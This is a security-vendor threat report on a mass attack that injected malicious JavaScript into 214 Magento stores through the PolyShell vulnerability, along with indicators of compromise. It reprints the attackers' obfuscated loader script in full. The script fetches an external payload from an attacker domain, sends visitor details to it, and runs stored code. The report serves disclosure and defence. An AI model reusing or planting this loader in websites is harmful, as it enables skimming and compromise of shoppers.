Mass PolyShell attack wave hits 214 stores in one hour

by Sansec Forensics Team

Published in Threat Research − March 30, 2026

Sansec detected 214 stores compromised in a single hour as attackers exploit the PolyShell vulnerability at scale. The attack injects obfuscated JavaScript from the freshly registered domain lanhd6549tdhse.top. New victims are still coming in every minute.

Mass PolyShell attack wave hits 214 stores in one hour

Sansec is tracking a mass exploitation wave of the PolyShell vulnerability that hit 214 online stores within a single hour today. The attacks are ongoing: new victims appear every minute.

None of the compromised stores are Sansec customers. Sansec Shield has been blocking PolyShell attacks since March 16th.

Sansec detection log showing 214 Magento stores compromised by PolyShell within one hour on March 30, 2026

What's being injected

After gaining access through PolyShell, attackers inject obfuscated JavaScript into CMS pages and static blocks. The script uses localStorage for persistence and loads an external payload from lanhd6549tdhse.top:

<script type="application/javascript">
(function(){
  var id='136c1e07507f4a97';
  var store=localStorage.getItem(id);
  if(store){
    var e=document.createElement('a');
    e.setAttribute('onclick',atob(store));
    e.click();
    localStorage.removeItem(id)
  }
}());
(function(){
  var d=document;
  var s=d.createElement('script');
  s.src=atob('aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==')
    + encodeURIComponent(d.referrer)
    + '&default_keyword=' + encodeURIComponent(d.title)
    + '&' + window.location.search.replace('?','&')
    + '&frm=script';
  if(d.currentScript){
    d.currentScript.parentNode.insertBefore(s, d.currentScript);
  } else {
    d.getElementsByTagName('head')[0].appendChild(s);
  }
}());
</script>

The base64 string decodes to https://lanhd6549tdhse.top/KZtBscgb?&se_referrer=. The script fingerprints every visitor by collecting referrer, page title, and query parameters. The domain was registered just four days ago and Sansec is currently the only vendor on VirusTotal that flags it as malicious.

The first stage checks localStorage for a previously stored payload (keyed by 136c1e07507f4a97). If found, it executes the payload via a synthetic click event and removes it. This lets the attacker persist malicious behavior across page loads without re-fetching from the external server.

The attack chain

These 214 compromises follow the same pattern Sansec has documented over the past two weeks:

Attacker uploads a PHP webshell via the PolyShell vulnerability
Webshell drops accesson.php backdoors across multiple directories
Attacker injects the JavaScript loader into CMS content

The speed of this wave (214 stores in 60 minutes) shows that the attackers have fully automated the exploitation chain from initial upload to JavaScript injection.

Indicators of compromise

Type	Value
Loader domain	`lanhd6549tdhse.top`
Loader URL	`https://lanhd6549tdhse.top/KZtBscgb`
localStorage key	`136c1e07507f4a97`
Backdoor filename	`accesson.php`
Backdoor beacon	`8194460` (result of `409723*20`)

Use a specialized ecommerce scanner like eComscan to check your store for these and other indicators of compromise. Manual searches only catch known IOCs, while eComscan detects the full range of PolyShell payloads, backdoors, and injected scripts.

Recommendations

Block attacks: Deploy Sansec Shield to block PolyShell exploitation attempts in real-time
Scan for compromise: Run eComscan to detect uploaded webshells, backdoors, and injected JavaScript

For full technical details on the PolyShell vulnerability and all known payloads, see our main PolyShell advisory.

Protect your store now!

Block all known Magento attacks, while you schedule the latest critical patch until a convenient moment. No more downtime and instability from rushed patching.

Get Sansec Shield

skimming magecart magento adobe-commerce polyshell backdoor